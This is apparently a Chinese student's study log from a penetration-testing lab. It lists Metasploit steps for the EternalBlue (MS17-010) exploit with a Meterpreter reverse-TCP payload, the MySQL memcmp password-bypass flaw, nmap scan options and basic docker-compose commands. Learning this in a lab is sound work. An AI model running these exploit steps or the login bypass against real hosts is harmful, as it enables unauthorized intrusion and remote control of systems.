今日学习内容
1.学习了msf攻击扫描指令:
msfconsole #进入框架
search ms17_010 # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue # 使用use进入模块
info #使用info查看模块信息 set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷
show options #查看模块需要配置的参数
set RHOST 192.168.100.158 #设置参数
exploit / run #攻击 后渗透阶段 #后渗透阶段
通过该实验可以学习当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
2.学习关于nmap扫描主机端口信息:
nmap -A 域名 强力扫描 --- 可以扫描的主机的信息(开放的端口,主机信息等)
nmap -sV 域名 对端口上的服务程序版本进行扫描
nmap -P0 禁ping的情况下使用nmap扫描
3.关于docker指令
docker-compose up -d 启动容器
docker-compose build 创建镜像
docker-compose down 关闭容器